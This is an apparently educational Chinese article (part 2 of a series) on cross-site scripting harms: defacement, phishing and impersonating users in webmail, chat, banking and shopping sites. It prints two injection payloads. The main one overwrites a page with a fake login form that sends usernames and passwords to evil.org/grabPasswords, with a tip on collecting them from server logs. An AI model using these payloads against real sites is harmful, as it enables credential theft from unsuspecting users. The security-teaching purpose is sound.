网站运营
位置:首页>> 网站运营>> 跨站脚本攻击深入解析:跨站危害及cookie盗窃(2)

跨站脚本攻击深入解析:跨站危害及cookie盗窃(2)

作者:康凯 来源:asp之家 发布时间:2009-12-24 17:12:00 

标签:跨站,脚本攻击,cookie


三、钓鱼攻击

通过假冒Web应用程序,攻击者可以将XSS用于社会工程。XSS攻击得手后,攻击者能够完全控制Web应用程序的外观。这可用于丑化web,例如攻击者在页面上放置一个无聊的图片。适于打印的常见图像之一是Stall0wn3d,即你被黑了。

下面是用于这种攻击的HTML注入字符串:

〈script〉document.body.innerHTML=“〈img src=http://evil.org/stallown3d.jpg〉”;〈/script〉。

然而,控制Web应用程序呈现在受害用户面前的外观比简单显示一些 * 热图更为有利,攻击者可以以此发动钓鱼攻击:强制用户向攻击者提供机密信息。利用document.body.innerHTML,可以提供一个跟有弱点的Web应用程序的登录页面外观完全一样的登录页面,并且该登录页面来自那个被注入HTML的域,但是提交表单时,数据却发往攻击者选择的站点。

因此,当受害用户输入他的或者她的用户名和口令时,这些信息就会落入攻击者手中。代码如下所示:

以下为引用的内容:

document.body.innerHTML=“〈 h1 〉Company Login〈 / h1〉〈form action=http://evil.org/grabPasswords method=get〉

〈p〉User name:〈input type=text name=u〉〈p〉Password〈input type=password

name=p〉〈input type=submit name=login〉〈/form〉”;


使用这段代码的一个小技巧是通过一个GET请求发送表单。这样,攻击者甚至不必编写grabPasswords页面,因为该请求将写到Web服务器的错误信息日志里,这里的信息可以轻松读取。


四、冒充受害者胡作非为

XSS对Web应用程序最大的影响在于,黑客能够通过它假冒成Web应用程序的合法用户。下面是一些攻击者能够对Web应用程序做的一些事情:

在一个webmail应用程序中,攻击者可以:

以用户的名义发送电子邮件

获取用户的联系人名单

更改自动BCC属性

更改隐私/日志记录设置

在基于 Web 的即时通讯或聊天软件中,攻击者可以:

获取联系人名单

向联系人发送消息

添加/删除联系人

在一个基于 Web 的网络银行或金融系统中,攻击者能够:

划拔资金

申请信用卡

更改地址

在电子商务系统上,攻击者能够:

购买商品

每当分析XSS对站点的影响时,想一想如果他控制了受害者的鼠标和键盘能干什么就行了。考虑一下受害者的内部网中的受害者的计算机能做哪些坏事。要想假冒成用户,攻击者需要弄清Web应用程序是如何工作的。有时候,可以通过阅读页面源代码来达此目的,但是最好的方法是使用一个Web代理,例如Burp Suite、WebScarab或者Paros Proxy等。

这些web 代理会拦截往返于Web 浏览器和Web服务器之间的所有通信数据,甚至包括通过HTTPS传输的流量。您可以记录这些会话以弄明白Web应用程序是向服务器发送回数据的。 这对于弄清楚如何假冒成该应用程序非常有帮助,此外,web 代理对于发现XSS及其他Web应用程序漏洞也有极大的帮助。

第一页 上一页 1
2
3 4 下一页
0
投稿

猜你喜欢

手机版 网站运营 asp之家 www.aspxhome.com